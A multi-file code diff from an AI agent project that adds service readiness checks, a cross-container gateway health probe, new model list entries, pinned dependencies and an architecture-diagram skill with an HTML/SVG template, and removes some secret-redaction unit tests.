PROJECT_ROOT = Path(__file__).parent.parent.resolve()
@@ -37,6 +38,10 @@ from hermes_cli.setup import (
from hermes_cli.colors import Colors, color
_SERVICE_READINESS_TIMEOUT = 30.0
_SERVICE_READINESS_POLL_INTERVAL = 0.2
# =============================================================================
# Process Management (for manual gateway runs)
# =============================================================================
@@ -1100,12 +1105,123 @@ def systemd_uninstall(system: bool = False):
print(f"{_service_scope_label(system).capitalize()} service uninstalled")
def _describe_startup_check(check_id: str, check: dict) -> str:
source = check.get("source")
detail = check.get("detail")
label = f"{check_id} ({source})" if source and source != check_id else check_id
return f"{label}: {detail}" if detail else label
def _classify_startup_checks(state: dict | None) -> tuple[list[str], list[str], list[str]]:
checks = (state or {}).get("startup_checks") or {}
pending_required: list[str] = []
failed_required: list[str] = []
optional_warnings: list[str] = []
if not isinstance(checks, dict):
return pending_required, failed_required, optional_warnings
for check_id, raw_check in checks.items():
check = raw_check if isinstance(raw_check, dict) else {}
label = _describe_startup_check(str(check_id), check)
check_state = str(check.get("state", "pending")).strip().lower()
required = bool(check.get("required", True))
if check_state == "ready":
continue
if required:
if check_state == "failed":
failed_required.append(label)
else:
pending_required.append(label)
else:
prefix = "failed" if check_state == "failed" else "pending"
optional_warnings.append(f"{prefix}: {label}")
return pending_required, failed_required, optional_warnings
def _wait_for_service_readiness(
*,
action: str,
previous_pid: int | None = None,
timeout: float = _SERVICE_READINESS_TIMEOUT,
poll_interval: float = _SERVICE_READINESS_POLL_INTERVAL,
) -> list[str]:
from gateway.status import get_running_pid, read_runtime_status
deadline = time.monotonic() + timeout
last_pending: list[str] = []
while time.monotonic() < deadline:
live_pid = get_running_pid()
if live_pid is None or (previous_pid is not None and live_pid == previous_pid):
time.sleep(poll_interval)
continue
runtime = read_runtime_status() or {}
try:
runtime_pid = int(runtime.get("pid"))
except (TypeError, ValueError):
runtime_pid = None
if runtime_pid != live_pid:
time.sleep(poll_interval)
continue
gateway_state = runtime.get("gateway_state")
pending_required, failed_required, optional_warnings = _classify_startup_checks(runtime)
last_pending = pending_required
if gateway_state == "startup_failed":
reason = runtime.get("exit_reason") or f"gateway {action} failed during startup"
raise RuntimeError(reason)
if failed_required:
raise RuntimeError(
"required startup checks failed: " + "; ".join(failed_required)
)
if gateway_state == "running" and not pending_required:
return optional_warnings
time.sleep(poll_interval)
if last_pending:
raise RuntimeError(
"timed out waiting for required startup checks: " + "; ".join(last_pending)
)
if previous_pid is not None:
raise RuntimeError(
f"timed out waiting for gateway {action}; previous process is still active or no new runtime became ready"
)
raise RuntimeError(f"timed out waiting for gateway {action} readiness")
def _await_service_ready_or_exit(
*,
action: str,
previous_pid: int | None = None,
timeout: float = _SERVICE_READINESS_TIMEOUT,
) -> None:
try:
optional_warnings = _wait_for_service_readiness(
action=action,
previous_pid=previous_pid,
timeout=timeout,
)
except RuntimeError as exc:
print_error(f" Gateway {action} did not become ready: {exc}")
raise SystemExit(1) from exc
for warning in optional_warnings:
print_warning(f" Optional startup check {warning}")
def systemd_start(system: bool = False):
system = _select_systemd_scope(system)
if system:
_require_root_for_system_service("start")
refresh_systemd_unit_if_needed(system=system)
_run_systemctl(["start", get_service_name()], system=system, check=True, timeout=30)
_await_service_ready_or_exit(action="start")
print(f"{_service_scope_label(system).capitalize()} service started")
@@ -1128,9 +1244,11 @@ def systemd_restart(system: bool = False):
pid = get_running_pid()
if pid is not None and _request_gateway_self_restart(pid):
print(f"{_service_scope_label(system).capitalize()} service restart requested")
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print(f"{_service_scope_label(system).capitalize()} service restarted")
return
_run_systemctl(["reload-or-restart", get_service_name()], system=system, check=True, timeout=90)
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print(f"{_service_scope_label(system).capitalize()} service restarted")
@@ -1389,6 +1507,7 @@ def launchd_start():
plist_path.write_text(generate_launchd_plist(), encoding="utf-8")
subprocess.run(["launchctl", "bootstrap", _launchd_domain(), str(plist_path)], check=True, timeout=30)
subprocess.run(["launchctl", "kickstart", f"{_launchd_domain()}/{label}"], check=True, timeout=30)
_await_service_ready_or_exit(action="start")
print("✓ Service started")
return
@@ -1401,6 +1520,7 @@ def launchd_start():
print("↻ launchd job was unloaded; reloading service definition")
subprocess.run(["launchctl", "bootstrap", _launchd_domain(), str(plist_path)], check=True, timeout=30)
subprocess.run(["launchctl", "kickstart", f"{_launchd_domain()}/{label}"], check=True, timeout=30)
_await_service_ready_or_exit(action="start")
print("✓ Service started")
def launchd_stop():
@@ -1471,7 +1591,8 @@ def launchd_restart():
try:
pid = get_running_pid()
if pid is not None and _request_gateway_self_restart(pid):
print("✓ Service restart requested")
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print("✓ Service restarted")
return
if pid is not None:
try:
@@ -1483,6 +1604,7 @@ def launchd_restart():
if not exited:
print(f"⚠ Gateway drain timed out after {drain_timeout:.0f}s — forcing launchd restart")
subprocess.run(["launchctl", "kickstart", "-k", target], check=True, timeout=90)
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print("✓ Service restarted")
except subprocess.CalledProcessError as e:
if e.returncode not in (3, 113):
@@ -1492,6 +1614,7 @@ def launchd_restart():
plist_path = get_launchd_plist_path()
subprocess.run(["launchctl", "bootstrap", _launchd_domain(), str(plist_path)], check=True, timeout=30)
subprocess.run(["launchctl", "kickstart", target], check=True, timeout=30)
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print("✓ Service restarted")
def launchd_status(deep: bool = False):
+34 -1
View File
@@ -4036,7 +4036,40 @@ def cmd_update(args):
capture_output=True, text=True, timeout=15,
)
if restart.returncode == 0:
restarted_services.append(svc_name)
# Verify the service actually survived the
# restart. systemctl restart returns 0 even
# if the new process crashes immediately.
import time as _time
_time.sleep(3)
verify = subprocess.run(
scope_cmd + ["is-active", svc_name],
capture_output=True, text=True, timeout=5,
)
if verify.stdout.strip() == "active":
restarted_services.append(svc_name)
else:
# Retry once — transient startup failures
# (stale module cache, import race) often
# resolve on the second attempt.
print(f"{svc_name} died after restart, retrying...")
retry = subprocess.run(
scope_cmd + ["restart", svc_name],
capture_output=True, text=True, timeout=15,
)
_time.sleep(3)
verify2 = subprocess.run(
scope_cmd + ["is-active", svc_name],
capture_output=True, text=True, timeout=5,
)
if verify2.stdout.strip() == "active":
restarted_services.append(svc_name)
print(f"{svc_name} recovered on retry")
else:
print(
f"{svc_name} failed to stay running after restart.\n"
f" Check logs: journalctl --user -u {svc_name} --since '2 min ago'\n"
f" Restart manually: systemctl {'--user ' if scope == 'user' else ''}restart {svc_name}"
)
else:
print(f" ⚠ Failed to restart {svc_name}: {restart.stderr.strip()}")
except (FileNotFoundError, subprocess.TimeoutExpired):
+3
View File
@@ -44,6 +44,7 @@ OPENROUTER_MODELS: list[tuple[str, str]] = [
("minimax/minimax-m2.7", ""),
("minimax/minimax-m2.5", ""),
("z-ai/glm-5.1", ""),
("z-ai/glm-5v-turbo", ""),
("z-ai/glm-5-turbo", ""),
("moonshotai/kimi-k2.5", ""),
("x-ai/grok-4.20", ""),
@@ -89,6 +90,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"minimax/minimax-m2.7",
"minimax/minimax-m2.5",
"z-ai/glm-5.1",
"z-ai/glm-5v-turbo",
"z-ai/glm-5-turbo",
"moonshotai/kimi-k2.5",
"x-ai/grok-4.20-beta",
@@ -134,6 +136,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"zai": [
"glm-5.1",
"glm-5",
"glm-5v-turbo",
"glm-5-turbo",
"glm-4.7",
"glm-4.5",
+73
View File
@@ -13,6 +13,7 @@ import asyncio
import hmac
import json
import logging
import os
import secrets
import sys
import threading
@@ -319,12 +320,68 @@ class EnvVarReveal(BaseModel):
key: str
_GATEWAY_HEALTH_URL = os.getenv("GATEWAY_HEALTH_URL")
_GATEWAY_HEALTH_TIMEOUT = float(os.getenv("GATEWAY_HEALTH_TIMEOUT", "3"))
def _probe_gateway_health() -> tuple[bool, dict | None]:
"""Probe the gateway via its HTTP health endpoint (cross-container).
Uses ``/health/detailed`` first (returns full state), falling back to
the simpler ``/health`` endpoint. Returns ``(is_alive, body_dict)``.
Accepts any of these as ``GATEWAY_HEALTH_URL``:
- ``http://gateway:8642`` (base URL recommended)
- ``http://gateway:8642/health`` (explicit health path)
- ``http://gateway:8642/health/detailed`` (explicit detailed path)
This is a **blocking** call run via ``run_in_executor`` from async code.
"""
if not _GATEWAY_HEALTH_URL:
return False, None
# Normalise to base URL so we always probe the right paths regardless of
# whether the user included /health or /health/detailed in the env var.
base = _GATEWAY_HEALTH_URL.rstrip("/")
if base.endswith("/health/detailed"):
base = base[: -len("/health/detailed")]
elif base.endswith("/health"):
base = base[: -len("/health")]
for path in (f"{base}/health/detailed", f"{base}/health"):
try:
req = urllib.request.Request(path, method="GET")
with urllib.request.urlopen(req, timeout=_GATEWAY_HEALTH_TIMEOUT) as resp:
if resp.status == 200:
body = json.loads(resp.read())
return True, body
except Exception:
continue
return False, None
@app.get("/api/status")
async def get_status():
current_ver, latest_ver = check_config_version()
# --- Gateway liveness detection ---
# Try local PID check first (same-host). If that fails and a remote
# GATEWAY_HEALTH_URL is configured, probe the gateway over HTTP so the
# dashboard works when the gateway runs in a separate container.
gateway_pid = get_running_pid()
gateway_running = gateway_pid is not None
remote_health_body: dict | None = None
if not gateway_running and _GATEWAY_HEALTH_URL:
loop = asyncio.get_event_loop()
alive, remote_health_body = await loop.run_in_executor(
None, _probe_gateway_health
)
if alive:
gateway_running = True
# PID from the remote container (display only — not locally valid)
if remote_health_body:
gateway_pid = remote_health_body.get("pid")
gateway_state = None
gateway_platforms: dict = {}
@@ -341,7 +398,12 @@ async def get_status():
except Exception:
configured_gateway_platforms = None
# Prefer the detailed health endpoint response (has full state) when the
# local runtime status file is absent or stale (cross-container).
runtime = read_runtime_status()
if runtime is None and remote_health_body and remote_health_body.get("gateway_state"):
runtime = remote_health_body
if runtime:
gateway_state = runtime.get("gateway_state")
gateway_platforms = runtime.get("platforms") or {}
@@ -356,6 +418,17 @@ async def get_status():
if not gateway_running:
gateway_state = gateway_state if gateway_state in ("stopped", "startup_failed") else "stopped"
gateway_platforms = {}
elif gateway_running and remote_health_body is not None:
# The health probe confirmed the gateway is alive, but the local
# runtime status file may be stale (cross-container). Override
# stopped/None state so the dashboard shows the correct badge.
if gateway_state in (None, "stopped"):
gateway_state = "running"
# If there was no runtime info at all but the health probe confirmed alive,
# ensure we still report the gateway as running (no shared volume scenario).
if gateway_running and gateway_state is None and remote_health_body is not None:
gateway_state = "running"
active_sessions = 0
try:
+3 -3
View File
@@ -78,13 +78,13 @@ dingtalk = ["dingtalk-stream>=0.1.0,<1"]
feishu = ["lark-oapi>=1.5.3,<2"]
web = ["fastapi>=0.104.0,<1", "uvicorn[standard]>=0.24.0,<1"]
rl = [
"atroposlib @ git+https://github.com/NousResearch/atropos.git",
"tinker @ git+https://github.com/thinking-machines-lab/tinker.git",
"atroposlib @ git+https://github.com/NousResearch/atropos.git@c20c85256e5a45ad31edf8b7276e9c5ee1995a30",
"tinker @ git+https://github.com/thinking-machines-lab/tinker.git@30517b667f18a3dfb7ef33fb56cf686d5820ba2b",
"fastapi>=0.104.0,<1",
"uvicorn[standard]>=0.24.0,<1",
"wandb>=0.15.0,<1",
]
yc-bench = ["yc-bench @ git+https://github.com/collinear-ai/yc-bench.git ; python_version >= '3.12'"]
yc-bench = ["yc-bench @ git+https://github.com/collinear-ai/yc-bench.git@bfb0c88062450f46341bd9a5298903fc2e952a5c ; python_version >= '3.12'"]
all = [
"hermes-agent[modal]",
"hermes-agent[daytona]",
+1
View File
@@ -62,6 +62,7 @@ AUTHOR_MAP = {
"258577966+voidborne-d@users.noreply.github.com": "voidborne-d",
"70424851+insecurejezza@users.noreply.github.com": "insecurejezza",
"259807879+Bartok9@users.noreply.github.com": "Bartok9",
"268667990+Roy-oss1@users.noreply.github.com": "Roy-oss1",
# contributors (manual mapping from git names)
"dmayhem93@gmail.com": "dmahan93",
"samherring99@gmail.com": "samherring99",
+1 -1
View File
@@ -8,7 +8,7 @@
"start": "node bridge.js"
},
"dependencies": {
"@whiskeysockets/baileys": "WhiskeySockets/Baileys#fix/abprops-abt-fetch",
"@whiskeysockets/baileys": "WhiskeySockets/Baileys#01047debd81beb20da7b7779b08edcb06aa03770",
"express": "^4.21.0",
"qrcode-terminal": "^0.12.0",
"pino": "^9.0.0"
@@ -0,0 +1,129 @@
---
name: architecture-diagram
description: Generate professional dark-themed system architecture diagrams as standalone HTML/SVG files. Self-contained output with no external dependencies. Based on Cocoon AI's architecture-diagram-generator (MIT).
version: 1.0.0
author: Cocoon AI (hello@cocoon-ai.com), ported by Hermes Agent
license: MIT
dependencies: []
metadata:
hermes:
tags: [architecture, diagrams, SVG, HTML, visualization, infrastructure, cloud]
related_skills: [excalidraw]
---
# Architecture Diagram Skill
Generate professional, dark-themed technical architecture diagrams as standalone HTML files with inline SVG graphics. No external tools, no API keys, no rendering libraries — just write the HTML file and open it in a browser.
Based on [Cocoon AI's architecture-diagram-generator](https://github.com/Cocoon-AI/architecture-diagram-generator) (MIT).
## Workflow
1. User describes their system architecture (components, connections, technologies)
2. Generate the HTML file following the design system below
3. Save with `write_file` to a `.html` file (e.g. `~/architecture-diagram.html`)
4. User opens in any browser — works offline, no dependencies
### Output Location
Save diagrams to a user-specified path, or default to the current working directory:
```
./[project-name]-architecture.html
```
### Preview
After saving, suggest the user open it:
```bash
# macOS
open ./my-architecture.html
# Linux
xdg-open ./my-architecture.html
```
## Design System & Visual Language
### Color Palette (Semantic Mapping)
Use specific `rgba` fills and hex strokes to categorize components:
| Component Type | Fill (rgba) | Stroke (Hex) |
| :--- | :--- | :--- |
| **Frontend** | `rgba(8, 51, 68, 0.4)` | `#22d3ee` (cyan-400) |
| **Backend** | `rgba(6, 78, 59, 0.4)` | `#34d399` (emerald-400) |
| **Database** | `rgba(76, 29, 149, 0.4)` | `#a78bfa` (violet-400) |
| **AWS/Cloud** | `rgba(120, 53, 15, 0.3)` | `#fbbf24` (amber-400) |
| **Security** | `rgba(136, 19, 55, 0.4)` | `#fb7185` (rose-400) |
| **Message Bus** | `rgba(251, 146, 60, 0.3)` | `#fb923c` (orange-400) |
| **External** | `rgba(30, 41, 59, 0.5)` | `#94a3b8` (slate-400) |
### Typography & Background
- **Font:** JetBrains Mono (Monospace), loaded from Google Fonts
- **Sizes:** 12px (Names), 9px (Sublabels), 8px (Annotations), 7px (Tiny labels)
- **Background:** Slate-950 (`#020617`) with a subtle 40px grid pattern
```svg
<!-- Background Grid Pattern -->
<pattern id="grid" width="40" height="40" patternUnits="userSpaceOnUse">
<path d="M 40 0 L 0 0 0 40" fill="none" stroke="#1e293b" stroke-width="0.5"/>
</pattern>
```
## Technical Implementation Details
### Component Rendering
Components are rounded rectangles (`rx="6"`) with 1.5px strokes. To prevent arrows from showing through semi-transparent fills, use a **double-rect masking technique**:
1. Draw an opaque background rect (`#0f172a`)
2. Draw the semi-transparent styled rect on top
### Connection Rules
- **Z-Order:** Draw arrows *early* in the SVG (after the grid) so they render behind component boxes
- **Arrowheads:** Defined via SVG markers
- **Security Flows:** Use dashed lines in rose color (`#fb7185`)
- **Boundaries:**
- *Security Groups:* Dashed (`4,4`), rose color
- *Regions:* Large dashed (`8,4`), amber color, `rx="12"`
### Spacing & Layout Logic
- **Standard Height:** 60px (Services); 80-120px (Large components)
- **Vertical Gap:** Minimum 40px between components
- **Message Buses:** Must be placed *in the gap* between services, not overlapping them
- **Legend Placement:** **CRITICAL.** Must be placed outside all boundary boxes. Calculate the lowest Y-coordinate of all boundaries and place the legend at least 20px below it.
## Document Structure
The generated HTML file follows a four-part layout:
1. **Header:** Title with a pulsing dot indicator and subtitle
2. **Main SVG:** The diagram contained within a rounded border card
3. **Summary Cards:** A grid of three cards below the diagram for high-level details
4. **Footer:** Minimal metadata
### Info Card Pattern
```html
<div class="card">
<div class="card-header">
<div class="card-dot cyan"></div>
<h3>Title</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
</ul>
</div>
```
## Output Requirements
- **Single File:** One self-contained `.html` file
- **No External Dependencies:** All CSS and SVG must be inline (except Google Fonts)
- **No JavaScript:** Use pure CSS for any animations (like pulsing dots)
- **Compatibility:** Must render correctly in any modern web browser
## Template Reference
Load the full HTML template for the exact structure, CSS, and SVG component examples:
```
skill_view(name="architecture-diagram", file_path="templates/template.html")
```
The template contains working examples of every component type (frontend, backend, database, cloud, security), arrow styles (standard, dashed, curved), security groups, region boundaries, and the legend — use it as your structural reference when generating diagrams.
@@ -0,0 +1,319 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>[PROJECT NAME] Architecture Diagram</title>
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500;600;700&display=swap" rel="stylesheet">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'JetBrains Mono', monospace;
background: #020617;
min-height: 100vh;
padding: 2rem;
color: white;
}
.container {
max-width: 1200px;
margin: 0 auto;
}
.header {
margin-bottom: 2rem;
}
.header-row {
display: flex;
align-items: center;
gap: 1rem;
margin-bottom: 0.5rem;
}
.pulse-dot {
width: 12px;
height: 12px;
background: #22d3ee;
border-radius: 50%;
animation: pulse 2s infinite;
}
@keyframes pulse {
0%, 100% { opacity: 1; }
50% { opacity: 0.5; }
}
h1 {
font-size: 1.5rem;
font-weight: 700;
letter-spacing: -0.025em;
}
.subtitle {
color: #94a3b8;
font-size: 0.875rem;
margin-left: 1.75rem;
}
.diagram-container {
background: rgba(15, 23, 42, 0.5);
border-radius: 1rem;
border: 1px solid #1e293b;
padding: 1.5rem;
overflow-x: auto;
}
svg {
width: 100%;
min-width: 900px;
display: block;
}
.cards {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
gap: 1rem;
margin-top: 2rem;
}
.card {
background: rgba(15, 23, 42, 0.5);
border-radius: 0.75rem;
border: 1px solid #1e293b;
padding: 1.25rem;
}
.card-header {
display: flex;
align-items: center;
gap: 0.5rem;
margin-bottom: 0.75rem;
}
.card-dot {
width: 8px;
height: 8px;
border-radius: 50%;
}
.card-dot.cyan { background: #22d3ee; }
.card-dot.emerald { background: #34d399; }
.card-dot.violet { background: #a78bfa; }
.card-dot.amber { background: #fbbf24; }
.card-dot.rose { background: #fb7185; }
.card h3 {
font-size: 0.875rem;
font-weight: 600;
}
.card ul {
list-style: none;
color: #94a3b8;
font-size: 0.75rem;
}
.card li {
margin-bottom: 0.375rem;
}
.footer {
text-align: center;
margin-top: 1.5rem;
color: #475569;
font-size: 0.75rem;
}
</style>
</head>
<body>
<div class="container">
<!-- Header -->
<div class="header">
<div class="header-row">
<div class="pulse-dot"></div>
<h1>[PROJECT NAME] Architecture</h1>
</div>
<p class="subtitle">[Subtitle description]</p>
</div>
<!-- Main Diagram -->
<div class="diagram-container">
<svg viewBox="0 0 1000 680">
<!-- Definitions -->
<defs>
<marker id="arrowhead" markerWidth="10" markerHeight="7" refX="9" refY="3.5" orient="auto">
<polygon points="0 0, 10 3.5, 0 7" fill="#64748b" />
</marker>
<pattern id="grid" width="40" height="40" patternUnits="userSpaceOnUse">
<path d="M 40 0 L 0 0 0 40" fill="none" stroke="#1e293b" stroke-width="0.5"/>
</pattern>
</defs>
<!-- Background Grid -->
<rect width="100%" height="100%" fill="url(#grid)" />
<!-- =================================================================
COMPONENT EXAMPLES - Copy and customize these patterns
================================================================= -->
<!-- External/Generic Component -->
<rect x="30" y="280" width="100" height="50" rx="6" fill="rgba(30, 41, 59, 0.5)" stroke="#94a3b8" stroke-width="1.5"/>
<text x="80" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">Users</text>
<text x="80" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">Browser/Mobile</text>
<!-- Security Component -->
<rect x="30" y="80" width="100" height="60" rx="6" fill="rgba(136, 19, 55, 0.4)" stroke="#fb7185" stroke-width="1.5"/>
<text x="80" y="105" fill="white" font-size="11" font-weight="600" text-anchor="middle">Auth Provider</text>
<text x="80" y="121" fill="#94a3b8" font-size="9" text-anchor="middle">OAuth 2.0</text>
<!-- Region/Cloud Boundary -->
<rect x="160" y="40" width="820" height="620" rx="12" fill="rgba(251, 191, 36, 0.05)" stroke="#fbbf24" stroke-width="1" stroke-dasharray="8,4"/>
<text x="172" y="58" fill="#fbbf24" font-size="10" font-weight="600">AWS Region: us-west-2</text>
<!-- AWS/Cloud Service -->
<rect x="200" y="280" width="110" height="50" rx="6" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1.5"/>
<text x="255" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">CloudFront</text>
<text x="255" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">CDN</text>
<!-- Multi-line AWS Component (S3 Buckets example) -->
<rect x="200" y="380" width="110" height="100" rx="6" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1.5"/>
<text x="255" y="400" fill="white" font-size="11" font-weight="600" text-anchor="middle">S3 Buckets</text>
<text x="255" y="420" fill="#94a3b8" font-size="8" text-anchor="middle">• bucket-one</text>
<text x="255" y="434" fill="#94a3b8" font-size="8" text-anchor="middle">• bucket-two</text>
<text x="255" y="448" fill="#94a3b8" font-size="8" text-anchor="middle">• bucket-three</text>
<text x="255" y="466" fill="#fbbf24" font-size="7" text-anchor="middle">OAI Protected</text>
<!-- Security Group (dashed boundary) -->
<rect x="350" y="265" width="120" height="80" rx="8" fill="transparent" stroke="#fb7185" stroke-width="1" stroke-dasharray="4,4"/>
<text x="358" y="279" fill="#fb7185" font-size="8">sg-name :port</text>
<!-- Component inside security group -->
<rect x="360" y="280" width="100" height="50" rx="6" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1.5"/>
<text x="410" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">Load Balancer</text>
<text x="410" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">HTTPS :443</text>
<!-- Backend Component -->
<rect x="510" y="280" width="110" height="50" rx="6" fill="rgba(6, 78, 59, 0.4)" stroke="#34d399" stroke-width="1.5"/>
<text x="565" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">API Server</text>
<text x="565" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">FastAPI :8000</text>
<!-- Database Component -->
<rect x="700" y="280" width="120" height="50" rx="6" fill="rgba(76, 29, 149, 0.4)" stroke="#a78bfa" stroke-width="1.5"/>
<text x="760" y="300" fill="white" font-size="11" font-weight="600" text-anchor="middle">Database</text>
<text x="760" y="316" fill="#94a3b8" font-size="9" text-anchor="middle">PostgreSQL</text>
<!-- Frontend Component -->
<rect x="200" y="520" width="200" height="110" rx="8" fill="rgba(8, 51, 68, 0.4)" stroke="#22d3ee" stroke-width="1.5"/>
<text x="300" y="545" fill="white" font-size="12" font-weight="600" text-anchor="middle">Frontend</text>
<text x="300" y="565" fill="#94a3b8" font-size="9" text-anchor="middle">React + TypeScript</text>
<text x="300" y="580" fill="#94a3b8" font-size="9" text-anchor="middle">Additional detail</text>
<text x="300" y="595" fill="#94a3b8" font-size="9" text-anchor="middle">More info</text>
<text x="300" y="615" fill="#22d3ee" font-size="8" text-anchor="middle">domain.example.com</text>
<!-- =================================================================
ARROW EXAMPLES
================================================================= -->
<!-- Standard arrow with label -->
<line x1="130" y1="305" x2="198" y2="305" stroke="#22d3ee" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<text x="164" y="299" fill="#94a3b8" font-size="9" text-anchor="middle">HTTPS</text>
<!-- Simple arrow (no label) -->
<line x1="310" y1="305" x2="358" y2="305" stroke="#22d3ee" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<!-- Vertical arrow -->
<line x1="255" y1="330" x2="255" y2="378" stroke="#fbbf24" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<text x="270" y="358" fill="#94a3b8" font-size="9">OAI</text>
<!-- Dashed arrow (for auth/security flows) -->
<line x1="460" y1="305" x2="508" y2="305" stroke="#34d399" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<line x1="620" y1="305" x2="698" y2="305" stroke="#a78bfa" stroke-width="1.5" marker-end="url(#arrowhead)"/>
<text x="655" y="299" fill="#94a3b8" font-size="9">TLS</text>
<!-- Curved path for auth flow -->
<path d="M 80 140 L 80 200 Q 80 220 100 220 L 200 220 Q 220 220 220 240 L 220 278" fill="none" stroke="#fb7185" stroke-width="1.5" stroke-dasharray="5,5"/>
<text x="150" y="210" fill="#fb7185" font-size="8">JWT + PKCE</text>
<!-- =================================================================
LEGEND
================================================================= -->
<text x="720" y="70" fill="white" font-size="10" font-weight="600">Legend</text>
<rect x="720" y="82" width="16" height="10" rx="2" fill="rgba(8, 51, 68, 0.4)" stroke="#22d3ee" stroke-width="1"/>
<text x="742" y="90" fill="#94a3b8" font-size="8">Frontend</text>
<rect x="720" y="98" width="16" height="10" rx="2" fill="rgba(6, 78, 59, 0.4)" stroke="#34d399" stroke-width="1"/>
<text x="742" y="106" fill="#94a3b8" font-size="8">Backend</text>
<rect x="720" y="114" width="16" height="10" rx="2" fill="rgba(120, 53, 15, 0.3)" stroke="#fbbf24" stroke-width="1"/>
<text x="742" y="122" fill="#94a3b8" font-size="8">Cloud Service</text>
<rect x="720" y="130" width="16" height="10" rx="2" fill="rgba(76, 29, 149, 0.4)" stroke="#a78bfa" stroke-width="1"/>
<text x="742" y="138" fill="#94a3b8" font-size="8">Database</text>
<rect x="720" y="146" width="16" height="10" rx="2" fill="rgba(136, 19, 55, 0.4)" stroke="#fb7185" stroke-width="1"/>
<text x="742" y="154" fill="#94a3b8" font-size="8">Security</text>
<line x1="720" y1="168" x2="736" y2="168" stroke="#fb7185" stroke-width="1" stroke-dasharray="3,3"/>
<text x="742" y="171" fill="#94a3b8" font-size="8">Auth Flow</text>
<rect x="720" y="178" width="16" height="10" rx="2" fill="transparent" stroke="#fb7185" stroke-width="1" stroke-dasharray="3,3"/>
<text x="742" y="186" fill="#94a3b8" font-size="8">Security Group</text>
</svg>
</div>
<!-- Info Cards -->
<div class="cards">
<div class="card">
<div class="card-header">
<div class="card-dot rose"></div>
<h3>Card Title 1</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
<li>• Item three</li>
<li>• Item four</li>
</ul>
</div>
<div class="card">
<div class="card-header">
<div class="card-dot amber"></div>
<h3>Card Title 2</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
<li>• Item three</li>
<li>• Item four</li>
</ul>
</div>
<div class="card">
<div class="card-header">
<div class="card-dot violet"></div>
<h3>Card Title 3</h3>
</div>
<ul>
<li>• Item one</li>
<li>• Item two</li>
<li>• Item three</li>
<li>• Item four</li>
</ul>
</div>
</div>
<!-- Footer -->
<p class="footer">
[Project Name] • [Additional metadata]
</p>
</div>
</body>
</html>
-80
View File
@@ -781,83 +781,3 @@ class TestTokenBudgetTailProtection:
# Tool at index 2 is outside the protected tail (last 3 = indices 2,3,4)
# so it might or might not be pruned depending on boundary
assert isinstance(pruned, int)
class TestSerializeRedactsSecrets:
"""Verify that _serialize_for_summary strips secrets before they reach the summarizer LLM."""
def _make_compressor(self):
with patch("agent.context_compressor.get_model_context_length", return_value=100000):
return ContextCompressor(model="test", quiet_mode=True)
def test_redacts_api_key_in_tool_result(self):
c = self._make_compressor()
turns = [{"role": "tool", "content": "OPENAI_API_KEY=sk-proj-abc123def456ghi789jkl012", "tool_call_id": "tc1"}]
result = c._serialize_for_summary(turns)
assert "abc123def456" not in result
assert "sk-proj" not in result
def test_redacts_api_key_in_user_message(self):
c = self._make_compressor()
turns = [{"role": "user", "content": "My key is sk-proj-abc123def456ghi789jkl012"}]
result = c._serialize_for_summary(turns)
assert "abc123def456" not in result
def test_redacts_secret_in_tool_call_arguments(self):
c = self._make_compressor()
turns = [{
"role": "assistant",
"content": "",
"tool_calls": [{
"function": {
"name": "bash",
"arguments": '{"command": "export OPENAI_API_KEY=sk-proj-abc123def456ghi789jkl012"}',
},
}],
}]
result = c._serialize_for_summary(turns)
assert "abc123def456" not in result
def test_redacts_github_pat_in_assistant_content(self):
c = self._make_compressor()
turns = [{"role": "assistant", "content": "Found token: ghp_abcdef1234567890abcdef1234567890abcd"}]
result = c._serialize_for_summary(turns)
assert "abcdef1234567890" not in result
def test_preserves_non_secret_content(self):
c = self._make_compressor()
turns = [
{"role": "user", "content": "Please fix the bug in src/main.py"},
{"role": "assistant", "content": "I found the issue on line 42."},
]
result = c._serialize_for_summary(turns)
assert "src/main.py" in result
assert "line 42" in result
class TestGenerateSummaryRedactsOutput:
"""Verify that _generate_summary redacts the summarizer LLM's output."""
def test_summary_output_is_redacted(self):
"""If the summarizer LLM echoes a secret despite instructions, it gets redacted."""
mock_response = MagicMock()
mock_response.choices = [MagicMock()]
mock_response.choices[0].message.content = (
"## Goal\nDeploy app.\n## Critical Context\n"
"User's API key: sk-proj-abc123def456ghi789jkl012"
)
with patch("agent.context_compressor.get_model_context_length", return_value=100000):
c = ContextCompressor(model="test", quiet_mode=True)
messages = [
{"role": "user", "content": "deploy my app"},
{"role": "assistant", "content": "deploying now"},
]
with patch("agent.context_compressor.call_llm", return_value=mock_response):
summary = c._generate_summary(messages)
assert "abc123def456" not in summary
# Also verify _previous_summary is redacted (iterative update path)
assert "abc123def456" not in (c._previous_summary or "")
+6
View File
@@ -93,6 +93,12 @@ def make_restart_runner(
runner._running_agent_count = GatewayRunner._running_agent_count.__get__(
runner, GatewayRunner
)
runner._snapshot_running_agents = GatewayRunner._snapshot_running_agents.__get__(
runner, GatewayRunner
)
